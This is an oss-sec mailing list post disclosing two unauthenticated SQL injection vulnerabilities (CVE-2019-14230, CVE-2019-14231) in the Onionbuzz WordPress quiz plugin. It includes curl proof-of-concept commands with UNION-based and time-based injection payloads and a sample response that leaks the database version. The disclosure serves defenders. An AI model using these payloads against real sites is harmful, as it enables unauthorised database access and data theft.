oss-sec mailing list archives

Re: Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin

From: Eugene Kolo <eugene () eugenekolo com>
Date: Mon, 22 Jul 2019 23:04:25 -0400

Assigned CVE-2019-14230 and CVE-2019-14231.

On Sat, Jul 20, 2019 at 6:35 PM Eugene Kolo <eugene () eugenekolo com> wrote:

Two unauthenticated/unprivileged SQL injection vulnerabilities in the
Viral Quiz Maker - Onionbuzz WordPress plugin.

Information
===========
Affected Product: Viral Quiz Maker - OnionBuzz WordPress plugin
Vendor Homepage: Onionbuzz.com
Vulnerability Type: SQL Injection
Discoverer: Eugene Kolodenker
Date: July-20-2019

1)

Description
===========
Prior to v1.2.2, you could exploit the `points` parameter in the
`ob_get_results` ajax nopriv handler due to there being no sanitization on
the points argument. The points parameter is not sanitized prior to be used
in a SQL query in getResultByPointsTrivia. This allows an
unauthenticated/unprivileged user to perform a SQL injection attack capable
of remote code execution and information disclosure.

Proof of Concept (POC)
======================
```
curl http://site/wp-admin/admin-ajax.php?action=ob_get_results --data
"type=get_result&id=1&quiz_type=5&points=1 or 1=0 union all select
1,1,version(),table_name,1,1,1,1,1 from information_schema.tables;#"
```

And get back:
```
{"quiz_id":1,"points":"1 or 1=0 union all select
1,1,version(),table_name,1,1,1,1,1 from
information_schema.tables;#","title":<DBVERSION>","description":"CHARACTER_SETS","featured_image":"<img
src=\"1\">","image_caption":"1","is_image":1,"success":1}
```


2)

Description
===========
Prior to v1.2.7, you could exploit the `id` parameter in the `set_count`
ajax nopriv handler due to there being no sanitization on the id argument.
The id parameter is not sanitized prior to be used in a SQL query in
saveQuestionVote. This allows an unauthenticated/unprivileged user to
perform a SQL injection attack capable of remote code execution and
information disclosure.


Proof of Concept (POC)
======================

```
curl http://site/wp-admin/admin-ajax.php?type=set_count --data
"action=ob_question_votes&id=1 or sleep(10);#"
```

Current thread:

Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin Eugene Kolo (Jul 21)
- Re: Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin Eugene Kolo (Jul 22)